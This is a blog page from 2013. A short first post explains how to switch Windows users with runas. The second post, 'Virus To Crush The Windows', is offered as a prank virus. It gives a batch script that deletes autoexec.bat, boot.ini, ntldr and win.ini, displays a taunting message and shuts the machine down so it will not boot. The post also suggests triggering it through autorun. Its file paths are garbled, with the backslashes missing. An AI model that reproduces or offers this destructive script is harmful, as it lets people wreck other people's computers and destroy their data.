There is a way to change users from the command prompt without logging off Windows.
1) Press Ctrl+Alt+Del to launch Task Manager and look for a process in the list called explorer.exe.
Click the End Process button.
2) Next, click on the file menu and choose New Task (Run…)
3) Enter “cmd” and hit enter to open the Command Prompt window
4) Inside the Command Prompt, use following syntax:
runas /user:username “explorer”
For example to switch to “Administrator” account, use the following command:
runas /user:Administrator “explorer”
Showing posts with label windows. Show all posts
Showing posts with label windows. Show all posts
Wednesday, September 25, 2013
Fast Switch User in Windows
Friday, August 2, 2013
Virus To Crush The Windows
This code will shutdown the computer and never to reboot again!
Use with care!
Copy the following code into notepad:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save as Hackmimic_crushwindows.bat
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Subscribe to:
Posts (Atom)